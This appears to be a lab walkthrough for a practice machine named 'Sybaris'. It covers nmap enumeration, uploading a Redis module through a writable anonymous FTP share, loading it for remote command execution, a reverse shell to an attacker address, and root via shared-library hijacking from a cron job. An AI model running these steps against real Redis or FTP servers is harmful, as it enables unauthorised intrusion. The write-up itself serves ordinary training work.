Sybaris

Enumeration

21/tcp    open   ftp       vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0               6 Apr 01  2020 pub [NSE: writeable]
...
6379/tcp  open   redis     Redis key-value store 5.0.9
...

Initial Access

$ redis-cli -h 192.168.71.93

No need password. We can get a shell with Redis RCE.

https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#load-redis-module

$ git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
$ cd RedisModules-ExecuteCommand 
$ make
$ cp module.so ../
ftp> put module.so

We can assume pub dir in base ftp dir which is /var/ftp.

$ redis-cli -h 192.168.71.93
192.168.71.93:6379> MODULE LOAD /var/ftp/pub/module.so
OK
192.168.71.93:6379> MODULE LIST
1) 1) "name"
   2) "system"
   3) "ver"
   4) (integer) 1
192.168.71.93:6379> system.exec "whoami"
"pablo\n"

https://www.revshells.com/ - Bash 196 - 192.168.49.71 80 /bin/bash

PrivEsc

Getting stable shell.

ssh -> pablo:[REDACTED]

There is a missing shared library which is utils.so. According to the crontab, there is a writable dir which is /usr/local/lib/dev(Ref. LD_LIBRARY_PATH). We can use this situation to get root shell.

https://www.contextis.com/en/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-library

In a minute, we could get root shell.

PreviousSplodgeNextWalla

Last updated